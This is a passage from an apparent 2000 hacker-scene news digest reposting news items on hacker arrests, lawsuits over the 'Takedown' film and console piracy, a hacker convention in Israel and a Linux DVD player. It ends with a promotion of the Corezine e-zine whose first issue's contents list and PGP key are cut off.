credit card fraud. But I think that Coolio should be punished, too. Being grounded (without the use of his computer) for two weeks might be adequate. Taking the cough syrup into account, let's make it a month. With Janet Reno's report, law enforcement is asking for more money to fight the looming specter of cybercrime. I'd love to know exactly how much money has been spent to track down this kid from New Hampshire. If law enforcement continues to dispense money willy-nilly to track adolescent pranksters, they will never have enough time, money, or personnel -- no matter how many times we increase their budget -- to recognize and go after the real criminals -- like the ones that the government predicts will only make their presence known once they are prepared to strike. Yeah, like, I remember the last time that happened, when Dr No hijacked those nuclear warheads off the coast of Cape Canaveral. It was really terrifying to have the whole world held hostage by a supercriminal like that. Perhaps Ms Reno et all need to spend a bit more time on the Internet, and a bit less time watching reruns on TV. @HWA 142.0 HNN:Mar 29th:@tlanta Con to be Held this Weekend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by fuller212 @tlanta con is a hacking/phreaking convention hosted by the South Eastern 2600 groups in Atlanta Georgia. It was created due to demand of another hacking convention in the South Eastern US. @tlanta Con will be held this Friday, Saturday and Sunday at the The Ramada Inn and Conference Center in Midtown Atlanta. Atlanta Con http://www.atlantacon.org/ ---------- @HWA 143.0 HNN:Mar 30th:MostHateD Busted for Burglary and Theft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Knack MostHateD (Patrick W. Gregory) was arrested on Tuesday and is being held in Harris County Jail in Texas charges of burglary and car theft. This arrest prevented him from appearing in federal court on Wednesday to plead guilty to defacing the White House web page. It is unclear hat the status of his federal charges are at this time. Houston Chronicle http://www.chron.com/cs/CDA/story.hts/metropolitan/507263 ---------- March 29, 2000, 10:07PM Computer hacker, 19, held on charges of burglary and car theft A computer hacker charged with breaking into White House, Army and Senate computers is being held in Harris County Jail on unrelated charges of burglary and car theft. Patrick W. Gregory, 19, who lives in east Harris County, had been scheduled to appear in federal court Wednesday to plead guilty to damaging computers and trafficking in unauthorized personal identification numbers. His Tuesday arrest prevented that. "What we have him for is fairly unspectacular," said sheriff's Capt. Don McWilliams. "These are not related to his prior federal cases. What we have him for is not related to that at all." He was arrested after the sheriff's Burglary Response Squad found enough evidence to charge him with burglary and unauthorized use of a vehicle. No details on that case were available. Only after arresting him did sheriff's investigators discover that Gregory was due to appear in federal court on the hacking charge. "What happens now with his federal situation, I couldn't say," McWilliams said. During his days as a high-profile, high-tech bandit, Gregory called himself "MostHateD" and headed a computer gang dubbed "globalHell," according to a plea agreement he signed earlier this month. The hacker group drew attention last May when it succeeded in getting into the White House Web site. That gang also is accused of vandalizing Army and Senate computers. Prosecutors accuse the group of illegally accessing teleconference services from AT&T, MCI and Sprint. Gregory was one of four Houston-area teens arrested. Gregory told the Houston Chronicle last June that globalHell numbered as many as 20 people, including a handful of international members, primarily in Europe. Most were youngsters trying to make a name for themselves through Web-hacking, he said. Gregory's hard drive, seized by government agents who raided his house, revealed he was adept at ducking in and out of varied databases, including the state of West Virginia's main Web page, the Philippines Bureau of Internal Revenue, the British Computer Society, the American Retirement Corp. and the government of Burundi. @HWA 144.0 HNN:Mar 30th:Miramax Sued for Fugitive Game ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The Miramax division of The Walt Disney Company has been sued for allegedly steal the story line of the 'The Fugitive Game' without the authors permission. 'The Fugitive Game' by Jonathan Littman details the arrest and capture of Kevin Mitnick. The Disney/Miramax/Dimension Films production of the movie Takedown premiered earlier this month in 29 theaters in Paris, France. The suit alleges that the movie is based in large part on Littman's book. Business Wire - via Northern Light http://library.northernlight.com/FB20000329240000273.html?cb ---------- Disney and Miramax Sued for 'Hacking'; Parts of 'The Fugitive Game' Allegedly Stolen For New Movie Story Filed: Wednesday, March 29, 2000 8:18 AM EST SAN FRANCISCO, Mar 29, 2000 (BUSINESS WIRE) -- The Walt Disney Company and its Miramax division have made a computer hacker movie that "hacked" the author's book without paying or giving credit to the writer, according to a lawsuit filed yesterday by Bartko, Zankel, Tarrant & Miller, a law firm representing best-selling author Jonathan Littman. Littman's suit alleges that the Disney/Miramax/Dimension Films production of the movie Takedown, which premiered earlier this month in 29 theatres in Paris, France, was based in large part on lifted segments of Littman's book, The Fugitive Game. Littman's book, published in 1996, is based on the celebrated capture of computer hacker Kevin Mitnick, who was billed at the time as the world's most notorious and dangerous "cyberterrorist." "Jonathan Littman carefully researched the reality of the computer hacker underworld," said his lawyer Bill Edlund. "His book articulated and supported his view that Kevin Mitnick was not the premeditated, greedy and destructive criminal portrayed by some of the media. Readers and critics received Littman's The Fugitive Game as a more in-depth presentation and entertaining expose of the flawed Mitnick prosecution than the overblown, self-interested media hype." The Fugitive Game shows Mitnick to be not a terrorist, but a computer hacker, in part a misguided victim of a government entrapment effort that used a sleazy informant to lure Mitnick into hacking. A key element of Littman's book is his examination of the media hype spurred in New York Times articles by reporter John Markoff about the Mitnick story. Littman also questions Markoff's presentation of Tsutomu Shimomura, a computer security specialist who used hacking techniques similar to Mitnick's to trace Mitnick to his hideout in North Carolina. Shimomura and Markoff wrote their version of these events in their book Takedown, released at the same time as Littman's book. The book is based on the seven-week pursuit of Mitnick by Shimomura that led to Mitnick's arrest in February of 1995. The Disney organization purchased the book and movie rights to Takedown and have now released their movie version, hiring a cast that included lead actor Skeet Ulrich and screenwriters led by John Danza. "The screenwriter could not shape the story told in the book Takedown into a workable script," said Edlund. "Once the movie project began to flounder, Danza and other screenwriters lifted most of the first part of Littman's The Fugitive Game for the storyline and start of the movie Takedown. Littman's lawsuit is backed by e-mails allegedly sent by Danza. In the e-mails, the screenwriter admits that it was 'unfortunate' that Disney did not option the rights to the book The Fugitive Game to make the movie Takedown. Danza goes on to describe his desire to use Littman's insider information and parts of Littman's book in order to try and salvage the movie project." The complaint presents a detailed comparison between Littman's book and the final shooting script for the movie Takedown, allegedly illustrating repeated and compelling similarities between the two. According to the allegations, the film Takedown and The Fugitive Game both open with a scene in a strip club frequented by a government informer who reveals to Mitnick information about "SAS" -- a secret Pacific Bell phone-tapping system that Mitnick subsequently breaks into and uses. Littman's lawsuit also contends that various themes and interpretations from his book that are absent from the book Takedown appear in the movie version of Takedown, including the government informer and entrapment of Mitnick, and the pressure on the government to capture Mitnick created by exaggerated media hype. Littman seeks to prevent Disney, Miramax and the other defendants from continuing to violate his copyrights by distributing the movie and to recover his damages and the wrongful profits that defendants obtained from the alleged theft of his work. Littman's lawyers say that the Disney-Miramax plagiarism tainted Littman's work by patching it into their motion picture. Because of this, he is also asking for damages that he claims resulted from opportunities he lost, including the opportunity for involvement with other movie projects based on The Fugitive Game. Distributed via COMTEX. Copyright (C) 2000 Business Wire. All rights reserved. CONTACT: Bartko, Zankel, Tarrant & Miller William I. Edlund, 415/291-4579 KEYWORD: CALIFORNIA INTERNATIONAL EUROPE INDUSTRY KEYWORD: MOTION PICTURES SOFTWARE ENTERTAINMENT PUBLISHING LEGAL/LAW Today's News On The Net - Business Wire's full file on the Internet with Hyperlinks to your home page. URL: http://www.businesswire.com Copyright © 2000, Business Wire, all rights reserved. You may now print or save this document. (cool thanks man) @HWA 145.0 HNN:Mar 30th:Glassbook Shattered ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Not a lamer Within a day after its release the new Stephen King book "Riding the Bullet" were circulating around the Internet. The first versions where simply screen shots of the protected PDF file but soon unlocked copies of the PDF where available. The unprotected PDF file was posted to a web site in Sweden and shortly thereafter a detailed explanation of the attack was posted to Usenet. eBookNet ZD Net Dejanews http://www.ebooknet.com/story.jsp?id http://www.zdnet.com/zdnn/stories/news/0,4586,2487101,00.html http://x37.deja.com/getdoc.xp?AN ---------- @HWA 146.0 HNN:Mar 30th:Yahoo Sued Over Piracy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Yesterday videogame makers Sega, Nintendo and Electronic Arts filed a lawsuit in U.S. District Court in San Francisco, against Yahoo. The suit accuses Yahoo of copyright and trademark infringement, unfair competition, and offering illegal devices for sale and seeks seeks compensatory damages of up to $100,000 per copyright violation, and up to $2,500 for sale of each 'mod chip'. Industry Standard - via Yahoo http://dailynews.yahoo.com/h/is/20000329/bs/20000329024.html ---------- Wednesday March 29 03:16 PM EST Videogame Makers Sue Yahoo Over Piracy Elinor Abreu (Industry Standard) Videogame makers Sega, Nintendo and Electronic Arts have filed a lawsuit against Yahoo, accusing the portal of ignoring sales of counterfeit videogames on its auction and mall areas. The lawsuit, which the manufacturers filed yesterday in U.S. District Court in San Francisco, accuses Yahoo of copyright and trademark infringement, unfair competition, and offering illegal devices for sale. The lawsuit asks the court to order Yahoo to stop the sales. It also seeks compensatory damages of up to $100,000 per copyright violation, and up to $2,500 for each sale of the hardware devices - some of which are called "Mod Chips" - that allow people to circumvent copyright protection, says Jeff Brown, a spokesman for Redwood City, Calif.-based Electronic Arts. Yahoo spokeswoman Diane Hunt offers little comment on the lawsuit. "We're not aware of specific situations," she says. The gamemakers claim people are selling the illegal items in Yahoo's auction area, and in the shopping area that Yahoo leases to outside merchants. "They are openly sold and labeled" with phrases like 'back up copy,' 'compilation disk' and 'never published,' according to Brown. "It's very widespread and blatant." Electronic Arts sent two letters about the matter to Yahoo's general counsel last summer. It followed the letters with phone calls, Brown says - all of which were ignored. At an industry meeting with Yahoo representatives in December 1999, the company seemed unconcerned, he adds. "Yahoo's position was that they either didn't care or didn't feel the need to address the problem," Brown says. "That is essentially what's forced us to find a legal solution." Electronic Arts says the problem crops up on other Web sites, but that the owners of those sites are either in discussions with Electronic Arts or have taken steps to resolve the problem. The company doesn't know the extent of its losses to online piracy, but it notes that a study by the Interactive Digital Software Association pegged worldwide losses from Net piracy and counterfeiting at $3.2 billion. The issue of piracy looms large for makers of computer software. That's particularly true overseas, where enforcement can be lax and prices high. Within the U.S., makers of music CDs are battling with companies that offer ways to distribute digital music online. Representatives from Nintendo and Sega, the top two gamemakers in the U.S. after Electronic Arts, were not immediately available for comment. MP3 Sends Music Industry Back to School http://www.thestandard.com/article/display/0,1151,12393,00.html Copyright Case Streaming to Court http://www.thestandard.com/article/display/0,1151,8505,00.html Judge Halts DVD Encryption Hackers http://www.thestandard.com/article/display/0,1151,9063,00.html @HWA 147.0 HNN:Mar 30th:Italian University Attacked by Brazilian Intruders ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Computers at Como's Insubria University in northern Italy have been compromised by intruders based in Brazil according to police. The Department of Physical Sciences and Mathematics suffered intrusions on 130 different systems according to authorities. Technicians are working on tightening security on the network. EFE - via Northern Light http://library.northernlight.com/FA20000330540000296.html?cb ---------- BRAZILIAN HACKERS BREAK INTO COMO UNIVERSITY COMPUTER NETWORK Story Filed: Thursday, March 30, 2000 2:41 AM EST Rome, Mar 01, 2000 (EFE via COMTEX) -- Brazilian hackers broke into the computer system at Como's Insubria University in northern Italy, police said Wednesday, after university officials reported the incident. The break-in affected 130 computers used by professors, researchers, students and administrative personnel in the Department of Physical Sciences and Mathematics. Technicians have isolated the site from the rest of the university's data transmission network while they continue to work on eliminating the Brazilian virus. Italian technicians said the hackers were able to break the security code and gain access to the network, and used several computers to take control of the e-mail system. Even though an early check of the network revealed that damages to the system are not substantial, departmental activity has been at a total standstill for more than three days. EFE mr/dd/vc Copyright (c) 2000. Agencia EFE S.A. (holy crap now thats one ACE killer article! and they get paid? wow - Ed) @HWA 148.0 HNN:Mar 30th:E-commerce Site Accuses Other of Intrusions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond An e-commerce sites in China has accused another site of intruding into its systems several times over the last few months. Leaders at www 8848.net have denied the charges. The case has been referred to Beijing's Dongcheng District Public Security Sub-bureau for possible prosecution. Xinhua - via Northern Lights http://library.northernlight.com/FC20000327510000102.html?cb ---------- E-Commerce Companies Quarreling on Hacker Issues Story Filed: Monday, March 27, 2000 8:26 PM EST BEIJING (March 28) XINHUA - Several Beijing-based Electronic commerce companies are quarreling with each other on hacker issues recently. Sources with www.dangdang.com claim that its online bookstore has been hacked repeatedly this month. The sources said it believed that the hacker's Internet Protocol (IP) address was from another online shopping website, www 8848.net. An online discount store, www.123.com, also said that hacker from 8848 had invaded its website, said today's China Daily. Dangdang, who said the hacking had caused "serious economic losses, "has reported the case to Beijing's Dongcheng District Public Security Sub-bureau and has employed an attorney for possible investigation. However, the 8848 company denied the accusation and its CEO, Wang Juntao, confirmed that no person from his company had been involved in the behavior. Wang said that technically an IP address is very easy to imitate. He also indicated that some online shopping companies may hype the hacker issue. The 8848 net is the biggest domestic online shopping site and Dangdang claims it is the leading domestic online bookstore. Wang said that dot com companies should adopt more responsible attitudes on hacker issues, and should pay more attention to strengthening their network security than accusing competitors. The Dongcheng District police authority is cautious about the case. But an official said that there are still no reports on their investigation. A poll from a local company showed that more than half of its interviewees who have not shopped on-line said they will not try this kind of shopping in the next three months. Copyright © 2000, Xinhua News Agency, all rights reserved. (Suck don't they? geez - Ed) @HWA 149.0 HNN:Mar 30th:Australia To Protect Privacy of Works ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Australia's Privacy Commissioner has published Guidelines on Workplace E-mail, Web Browsing and Privacy, in an effort to protect the privacy of workers as they use corporate computer systems. The guidelines are expected to expected to be introduced in parliament within the next two weeks. AsiaPulse - via Northern Light http://library.northernlight.com/FA20000330910000165.html?cb ---------- Who cares. @HWA 150.0 HNN:Mar 31st:Y2Hack Goes on in Israel ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by tutlex Over 350 people attended the hacker convention held in Israel last Wednesday and Thursday. Local officials tried to shut the conference down but eventually relented and allowed the convention. Participants played 'Spot the Fed' (I thought that was a Defcon thing?) and participated in a conference call with Kevin Mitnick. Associated Press - via Yahoo USA Today Y2Hack http://dailynews.yahoo.com/h/ap/20000330/tc/israel_hacker_conference_1.html http://www.usatoday.com/life/cyber/tech/cth643.htm http://www.y2hack.com ---------- Yahoo; Thursday March 30 1:58 PM ET Hackers Hold Convention in Israel By LAURIE COPANS, Associated Press Writer JERUSALEM (AP) - Hackers from around the world overcame interrogations, censorship and an all-around bad image to hold Israel's first hacker convention, wrapping up the two-day conference Thursday without a glitch. The 350-strong gathering was the first of its kind since the Yahoo! and e-Bay commercial sites were crippled in February, reminding companies across the globe of the dangers hackers can pose. At the request of lawmakers, Israeli police had considered banning the conference, but Attorney General Eliyakim Rubinstein gave the go-ahead. One of the original hackers, John Draper of Fremont, Calif., said the hackers wanted to put a better face on the practice. ``A hacker is a person who is developing programs to make them better,'' Draper told The Associated Press. ``They aren't the kind of people who break into computer systems. That's a cracker.'' Draper, known by the handle ``Captain Crunch,'' helped launch the hacker phenomenon. In 1971, he discovered that a toy whistle from a cereal box reproduced the tone needed to open a free telephone line. Aware of his fame, Israeli security agents at the Los Angeles airport interrogated Draper for an hour, he said, and thoroughly searched his computer equipment before allowing him on the plane. ``There were many attempts to silence us on this,'' organizers said in a summary of the gathering, released on their Web site. Police prevented the organizers from publishing one of the results of the conference: a list of vulnerable Israeli commercial Web sites. To compile the list, participants played ``HackTheseSites'' with sites offered up by Israeli companies. The site owners were confident no one could thwart them, but they were wrong. When they weren't eating pizza or guzzling soda, the hackers sat bent over their computer screens. They discovered that 28 percent of the Israeli net is vulnerable - about the same proportion as the rest of the world, according to organizers. Police were invited to attend the conference and even to speak, but they turned down the offer, creating the game ``Spot the Fed.'' Participants were given the challenge of finding plainclothes policemen among them. If a person pointed out as suspicious was in fact a security official, the official was to get an ``I am the FED'' T-shirt, and the spotter an ``I spotted the FED'' shirt. But none were found out. Israeli lawmaker and former Science Minister Michael Eitan accepted an invitation to attend. He said that hacker games like those displayed at the conference were meant more to entertain ambitious youngsters than cause harm. ``I told them that as long as they all enjoy the freedom of the Internet and don't abuse this freedom, and make the public support police intervention, this will work,'' Eitan said in a telephone interview. Participants also got to speak to their guru - convicted cyberbandit Kevin Mitnick - in a conference call. The 36-year-old American bemoaned the strict probation terms that ban him from using a computer or any hi-tech device. Mitnick was released last year after serving five years in jail for breaking into the computer systems of some of America's biggest companies, including Motorola Inc. (NYSE:MOT - news), Novell Inc. (NasdaqNM:NOVL - news) and Sun Microsystems Inc. (NasdaqNM:SUNW - news) ``He had a lot of sympathy in the room - we all know not being able to touch a computer is a worse punishment than even being in jail,'' said Neora Shaul, a Tel Aviv computer programmer who helped coordinate the conference. - On the Net: Conference organizers at http://www.neora.com USA Today; Even hackers have an expo (Writer lives under a rock apparently - Ed) Hackers gather in Israel, despite govt. resistance JERUSALEM (AP) - Hackers from around the world overcame interrogations, censorship and an all-around bad image to hold Israel's first hacker convention. The two-day conference wrapped-up Thursday without a glitch. The 350-strong gathering was the first of its kind since the Yahoo! and eBay commercial sites were crippled in February, reminding companies across the globe of the dangers hackers can pose. At the request of lawmakers, Israeli police had considered banning the conference, but Attorney General Eliyakim Rubinstein gave the go-ahead. One of the original hackers, John Draper of Fremont, Calif., said hackers wanted to put a better face on the practice. ''A hacker is a person who is developing programs to make them better,'' Draper told The Associated Press. ''They aren't the kind of people who break into computer systems. That's a cracker.'' Draper, known by the handle ''Captain Crunch,'' helped launch the hacker phenomenon. In 1971, he discovered that a toy whistle from a cereal box reproduced the tone needed to open a free telephone line. Aware of his fame, Israeli security agents at the Los Angeles airport interrogated Draper for an hour, he said, and thoroughly searched his computer equipment before allowing him on the plane. ''There were many attempts to silence us on this,'' organizers said in a summary of the gathering, released on their Web site (www.neora.com/). Police prevented the organizers from publishing one of the results of the conference: a list of vulnerable Israeli commercial Web sites. To compile the list, participants played ''Hack These Sites'' with sites offered up by Israeli companies. The site owners were confident no one could penetrate them. Many were wrong. When they weren't eating pizza or guzzling soda, the hackers sat bent over their computer screens. They discovered that 28% of the Israeli net is vulnerable - about the same proportion as the rest of the world, according to organizers. Police were invited to attend the conference and even to speak, but they turned down the offer. Hackers engage in a game of ''Spot the Fed,'' challenging themselves to identify plainclothes policemen attending the conference. If a person pointed out as suspicious was in fact a security official, the official was to get an ''I am the FED'' T-shirt, and the spotter an ''I spotted the FED'' shirt. No security officials were identified. Israeli lawmaker and former Science Minister Michael Eitan accepted an invitation to attend. He said that hacker games like those displayed at the conference were meant more to entertain ambitious youngsters than cause harm. ''I told them that as long as they all enjoy the freedom of the Internet and don't abuse this freedom, and make the public support police intervention, this will work,'' Eitan said in a telephone interview. Participants also got to speak to their guru - convicted cyberbandit Kevin Mitnick - on a conference call. The 36-year-old American bemoaned the strict probation terms that ban him from using a computer or any hi-tech device. Mitnick was released last year after serving five years in jail for breaking into the computer systems of some of America's biggest companies, including Motorola Inc., Novell Inc. and Sun Microsystems Inc. ''He had a lot of sympathy in the room - we all know not being able to touch a computer is a worse punishment than even being in jail,'' said Neora Shaul, a Tel Aviv computer programmer who helped coordinate the conference. @HWA 151.0 HNN:Mar 31st:Another Member of Inferno.br Identified in Brazil ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by ps The Internet Crime Sector of the Sao Paulo Police in Brazil has questioned JxLxMx in connection with attacks on various web sites. Both JxLxMx and JZ, who was identified last week, will most likely be prosecuted for damages, crime against the honor of various authorities and fraudulent use of telecommunication systems, under article 10 of the law 926/96. IDG News Brazil - Portuguese http://www.uol.com.br/idgnow/inet/inet2000-03-30d.shl ---------- @HWA 152.0 HNN:Mar 31st:China Sets Up security Test Center ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench In an effort to test security problems related to hardware, database systems, application software systems and network equipment and related systems, The National Information Security Testing Evaluation and Certification Center has established a new branch, the Computer Testing Evaluation Center, in Beijing. AsiaBizTech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID ---------- Error The Reason: CID$B$N@_Dj$,4V0c$C$F$$$^$9!#%F%s%W%l!<%H$r3NG'$7$F2<$5$$(B nifty huh? @HWA 153.0 HNN:Mar 31st:Hackers Probe Physical Security of MIT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse The Massachusetts Institute of Technology, where the word hacker was coined, is a physical maze of underground steam tunnels and hidden passageways. Hackers traverse these passageways almost on a nightly basis looking for new challenges. The Boston Globe http://www.boston.com/dailyglobe2/090/metro/_Hackers_skirt_security_in _late_night_MIT_treks+.shtml ---------- See ISN story @HWA 154.0 HNN:Mar 31st:DVD for Linux is Now Legal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brad It was only a matter of time. After all the bruhaha over DeCSS someone has finally created a legal DVD player for the Linux platform. LinDVD has been created and will be marketed by Intervideo for $29.95 and will be available this spring. Wired Intervideo http://www.wired.com/news/business/0,1367,35311,00.html http://www.intervideo.com ---------- Legal DVD for Penguin-Heads by Michelle Finley 3:00 a.m. Mar. 31, 2000 PST "Woo-hoo! No more double-boot disks!" yelled Linux user Joe CapoBianco, in reaction to InterVideo's announcement that it will soon release a software DVD player/decoder for the Linux operating system. Although there is some support for DVD on Linux, some of the open source operating systems users set up their machines to run both Linux and Windows in order to watch DVD movies and play games. The lack of DVD support for Linux has come to the forefront lately, pushing some developers to come up with solutions that included an unauthorized DVD decoder for Linux, which resulted in lawsuits filed by the DVD industry. InterVideo has a long-standing Content Scrambling System (CSS) license, enabling it to produce and market DVD player/decoder software without violating copyright or other laws. InterVideo sales and marketing head Joe Monastiero says the Linux platform presents a variety of opportunities for the company to expand its existing technology base, including DVD software. "Of notable interest is the set-top environment; however, even the PC space has enough interest in Linux to make our development worthwhile," he said. "Additionally, as should be obvious based on the reports generated by Wired News a few months ago regarding DVD and Linux, the reason why the CSS hack was done for the Linux community is because traditional Windows multimedia developers writing Linux code are not exactly plentiful." The product, dubbed LinDVD, will allow users to play back DVD movies, interactive DVD titles, MPEG video content, and Video CDs on PCs that are equipped with a DVD drive without the need for a hardware decoder card. The decoder/player includes integrated MPEG1 and MPEG2 file playback, a powerful VCD 2.0 player, and SVCD playback. A full multi-channel Dolby Digital (TM) audio decoder will be included. LinDVD will be available late spring and will be priced at $29.95. If "someone writes a multichannel audio driver for their Linux sound card," Monastiero said, "the multichannel version would be $49.95 and would support full 5.1 output." In keeping with the spirit of open source ethics, Monastiero says that InterVideo is looking at ways to open up as much of the product as possible to the OS community. "Certainly, there will be an [application programming interface] published to create unique user experiences and [user interfaces]," he said. "We are also looking at ways to help developers port drivers to our code. "But the CSS, Dolby, and navigation code will definitely not be open source. We're doing this to add a legal player to the market that the DVD industry can also be happy with." "This is another exciting day for the Linux community," said Linus Torvalds, creator of the Linux operating system. "[Linux] continues to attract industry-leading software companies like InterVideo. Their digital video and audio products will greatly enhance the Linux multimedia experience." @HWA 155.0 HNN:Mar 31st:Y2K Survivalists Come Out of Hiding ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Fearing the end of the world, nuclear holocaust, and other terrible calamities a Japanese man traveled to extremely remote parts of Australia. He believed the world would be plunged into chaos as it entered the new millennium. The man traveled to the Willare Bridge roadhouse 2334km north of Perth. He arrived carrying a SAS basic remote survival book, a gas mask, dehydrated food items, a canteen, water purifying tablets and camping gear. He had tried to enter the country with a flak jacket and a blow gun but those where confiscated by customs officials. Fairfax IT http://www.it.fairfax.com.au/breaking/20000330/A39581-2000Mar30.html ---------- Japanese tourist survives Y2K test hiccup 14:40 Thursday 30 March 2000 AAP STAFF at a remote outback roadhouse in Western Australia revealed today how a Japanese tourist turned up on their doorstep equipped with a flak jacket and gas mask, fearing the Y2K bug would trigger a nuclear explosion. The terrified tourist had travelled to Australia, believing the world would be plunged into chaos as it entered the new millennium. Customs officials revealed yesterday how they stopped the man at immigration carrying a survival kit, a blow gun and a chemical warfare outfit. And in the latest development in the incredible saga, outback residents told today how the man feared Armageddon had arrived, when a routine generator check on New Year's Eve caused a blackout. Lisa Williams, who works at the Willare Bridge roadhouse 2334km north of Perth, said the man "freaked out'' when the generators cut out at about 10pm on 31 December, resulting in a four-minute power blackout. "He was running around going 'Y2K, Y2K', he was really panic-stricken,'' Williams said. She said the man's English was poor and nobody was able to make him understand what was happening. It was not until roadhouse manager Graeme McNamara telephoned a Japanese interpreter in Broome, who then spoke to the terrified tourist, that he calmed down. "She explained to him that no bombs were going to be falling and that there wasn't going to be a nuclear holocaust, it was just the generators being changed,'' Williams said. He told them he believed the millennium bug would trigger a nuclear explosion and he planned to head for the outback because he thought it would be the safest place to be. When he arrived in Australia, his flak jacket and the blow gun and darts, illegal in Australia, were confiscated by customs officials, it emerged yesterday. But the man was allowed to enter the country with the other items, which included an SAS basic remote survival book, a gas mask, dehydrated food, an army style water container, water purifying tablets and camping gear. Williams said she had tried to show the man the roadhouse's computer console was still working after the power was restored to reassure him that the millennium bug had not eventuated. "I was pointing to the computer and trying to explain to him but he was still in a state about it until he spoke to the interpreter,'' she said. Roadhouse co-manager Sheree Marich said the man, dressed in army-style camouflage gear, had arrived at the roadhouse earlier that afternoon by taxi from Broome, a 165km trip for which he paid about $300. "I didn't understand why the taxi driver had dropped him off to us at first,'' Marich said. "I actually thought he was a bit of a callous bastard who'd taken his money and dumped him in the middle of nowhere.'' She said it was only later that she learned that the man had researched the area and had asked to be taken there because of its remoteness. The man left Australia, content that the world had not come to an end, after enjoying a restful holiday. @HWA 156.0 CoreZine: New zine by lamagra of b0f ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Submitted by: Ed Site; http://corezine.seKure.de/ Owner: lamagra This zine first came out in July of 1999, three issues have been released at the url above with a fourth in the works, sadly you won't see it or any further releases as lamagra has decided not to continue the project. I highly recommend that you grab these while you can lest they disappear off the net, they contain high quality tech papers but proved to be too much work for one guy. Lack of advertising and a good plan also contributed to the demise of this zine and little or no response therefore materialized from a would-be audience. The first issue is included here as an example of the quality of this zine check it out and grab the others while you can. - Ed ----------------[ Personal Handle: lamagra Call him: lamagra, lama, lam Past handles: access-granted Handle origin: Blade (the movie) Date of Birth: 28-12-1981 Height: 185 cm Weight: uhmm, dunno Eye color: green-gray Hair Color: blonde Computers: i586 (120 Mhz) & i486 & i486 (laptop) Admin of: UNAH16, my network Sites Frequented: www.securityfocus.com URLs: http://bounce.to/unah16 Email: access-granted@geocities.com ----------------[ Favorite Things Women: hmmm, yeah Cars: cabrio's Foods: all Music: Hard-Core Computers: yeah Movies: all action and horror and *yeah* Comics: no Books: scientific books Magazines: corezine, b4b0 TV: friends Quotes: join the army, meet intresting people, kill them People: peter, bea, an, psionic, A grue, grimknight, etc. Misc: Turn Ons: belly button peercing Turn Offs: ignorance lamagra can be found on EFnet in #b0f ... COREZINE - faq ~~~~~~~~~~~~~~~~~ FAQ: Q: Why did i start corezine? A: Mainly because i want to help spread the knowledge. I like to get into new things, but sometimes there's just no info about it anywhere. Then you'll have to look at the source (read: linux kernel), but this is way over the heads of some people. Nobody likes to look in that big piece of code, so they'll just say "nah, nevermind. I'll go do something else". Basicly i want to save people from all this trouble. If you need help, mail me. Don't waste time in lame channels on IRC packed with people who don't want to help or can't help (#coders, #linux). COREZINE - sample issue ~~~~~~~~~~~~~~~~~~~~~~~ First release July 1999 _____ _______ / __ \ |___ (_) | / \/ ___ _ __ ___ / / _ _ __ ___ | | / _ \| '__/ _ \ / / | | '_ \ / _ \ | \__/\ (_) | | | __/./ /__| | | | | __/ \____/\___/|_| \___|\_____/_|_| |_|\___| ------[ Corezine volume 01 - Juli 1999 Corezine #01 ================== --------[ info This is the first release of our brand new ezine. Since it's the first one, it's not really fantastic. We put it together in a week. But next time (i prommis) i'll be huge and fantastic. By then i hope to have finished my "ulimate backdoor", which i will release then. Psionic is working on a new and bigger tutor on installing linux. Everyone should have linux or BSD. We hope to get a lot of readermail and other responses. You can mail us at . If you want to encrypt your mail, i've added a PGP-key at the bottom of this text. REMEMBER: Big Brother is watching. BTW: i've added extract.c to easily extract the programs included in this ezine. I didn't make it myself, you could say i ripped from phrack. But it's not, i just have a lot of stuff to do. The program uses the <++> and <--> tags, they aren't part of the texts or programs. --------[ table of contents 1. introduction by corestaff 2. worldnews by peak 3. guide on bufferoverflows by lamagra 4. tutorial on sockets by xphantom 5. guide on file permissions by lamagra 6. an introduction to perl by darkmo0n 7. art of backdoors by meb 8. tutorial on installing linux by psionic K 9. hyperterminal trick in windows by burntash 10. an introduction to C by psylence 11. a guide on finding holes (in addition to the first text) 17 K 142 K --------[ Warez extract.c: see above Phrack lkm.tgz: my kernel module lamagra Corestaff signing off. <++> corezine.pgp -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.0i for non-commercial use mQGiBDeUjooRBAD/e8RiD1lNRhol32QTse2+fDad6r6IzWK01VSvaOOIwqgjAwPD BShcGR2wU3kQ/Y/yT+aW1tmkVThG1k56jryrifu8P6s5EwoRMuFAjmXx9S4s7Px9 EpD7QJ6e8Ha8nX5oMkzo4lwVg6iJeXBpEsv0fi4JosvfbOvY3A82VGsAvwCg/82F 